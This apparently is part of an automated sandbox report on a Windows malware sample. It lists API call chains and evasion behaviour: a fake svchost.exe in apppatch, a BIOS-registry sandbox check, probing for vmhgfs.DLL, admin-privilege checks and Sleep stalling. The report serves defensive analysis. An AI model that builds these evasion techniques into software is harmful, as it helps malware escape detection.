Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_01432590
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_014244F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_0142FFE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_01411670
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_013A1150
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_01381180
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,6_2_0138C9F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_013A11C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_01387020
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_0139B810
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,6_2_01399860
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_013A2320
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_013A0BE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,6_2_01383510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_013A2590
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_0139FDC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_013944F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_0139FFE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_01381670
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,10_2_03232320
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,10_2_03230BE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,10_2_03231150
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,10_2_03211180
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,10_2_0321C9F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,10_2_032311C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,10_2_03217020
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,10_2_0322B810
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,10_2_03229860
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,10_2_0322FFE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,10_2_03211670
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,10_2_03213510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,10_2_03232590
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,10_2_0322FDC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,10_2_032244F0
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00403900 RegQueryValueEx -> SystemBiosVersion/Date0_2_00403900
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00403900 RegQueryValueEx -> SystemBiosVersion/Date2_2_00403900
Found evasive API chain (may stop execution after checking volume information)
Source: C:\Users\user\Desktop\WlCVLbzNph.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_0-29899
Found evasive API chain checking for user administrative privileges
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-29931
Source: C:\Windows\apppatch\svchost.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_2-81088
Found stalling execution ending in API Sleep call
Source: C:\Windows\apppatch\svchost.exeStalling execution: Execution stalls by calling Sleepgraph_2-80944
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vmhgfs.DLLJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile opened / queried: C:\Users\user\Desktop\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\apppatch\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\system\vmhgfs.DLLJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00401A30 rdtsc 0_2_00401A30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02C76A30
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 2356Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 1003Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 1007Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 3705Jump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C864A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,2_2_02C864A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014264A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_014264A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013964A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_013964A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032264A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,10_2_032264A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeAPI coverage: 2.1 %
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeAPI coverage: 2.1 %
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeAPI coverage: 2.2 %
Source: C:\Windows\apppatch\svchost.exe TID: 2332Thread sleep count: 2356 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 2332Thread sleep time: -235600s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 4824Thread sleep count: 1003 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 4824Thread sleep time: -100300s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 3636Thread sleep count: 1007 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 3636Thread sleep time: -100700s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 2332Thread sleep count: 3705 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 2332Thread sleep time: -370500s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 2848Thread sleep time: -60000s >= -30000sJump to behavior
